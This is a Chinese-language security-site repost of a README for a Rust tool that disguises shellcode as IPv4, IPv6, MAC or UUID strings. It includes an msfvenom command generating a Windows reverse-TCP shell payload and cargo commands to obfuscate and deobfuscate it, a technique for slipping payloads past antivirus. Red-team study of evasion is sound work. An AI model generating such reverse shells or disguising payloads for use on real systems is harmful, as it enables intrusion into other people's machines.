Shellcode 混淆和反混淆技术

admin 2024年6月7日01:13:17评论6 views字数 966阅读3分13秒阅读模式

Shellcode 混淆和反混淆技术

使用此代码,您可以使用 Ipv4、Ipv6、MAC、UUiD 格式对 shellcode 进行混淆和反混淆。

用途

出于安全原因。我正在删除 payload.bin。你自己生成 .bin...!

例子:

msfvenom -p windows/shell/reverse_tcp lhost=eth0 lport=4444 -f raw -o payload.bin

命令格式

cargo run -- -f <file> -t <technique> -o <operation>

只需运行该程序即可查看用法

cargo run

Shellcode 混淆和反混淆技术

混淆有效载荷。

cargo run -- -f .payload.bin -t ipv4 -o obfuscate

Shellcode 混淆和反混淆技术

对payload进行反混淆

cargo run -- -f .obfuscated_ipv4.txt -t ipv4 -o deobfuscate

Shellcode 混淆和反混淆技术

所有用途

混淆命令

使用 IPv4 进行混淆

cargo run -- -f .payload.bin -t ipv4 -o obfuscate

使用 IPv6 进行混淆

cargo run -- -f .payload.bin -t ipv6 -o obfuscate

使用 MAC 进行混淆

cargo run -- -f .payload.bin -t mac -o obfuscate

使用 UUID 进行混淆

cargo run -- -f .payload.bin -t uuid -o obfuscate

反混淆命令

使用 IPv4 进行反混淆

cargo run -- -f .obfuscated_ipv4.txt -t ipv4 -o deobfuscate

使用 IPv6 进行反混淆

cargo run -- -f .obfuscated_ipv6.txt -t ipv6 -o deobfuscate

使用 MAC 进行反混淆

cargo run -- -f .obfuscated_mac.txt -t mac -o deobfuscate

使用 UUID 进行反混淆

cargo run -- -f .obfuscated_uuid.txt -t uuid -o deobfuscate
Shellcode Obfuscation and Deobfuscation Techniquehttps://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/obfuscation

原文始发于微信公众号(Ots安全):Shellcode 混淆和反混淆技术

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月7日01:13:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Shellcode 混淆和反混淆技术https://cn-sec.com/archives/2818584.html

发表评论

匿名网友 填写信息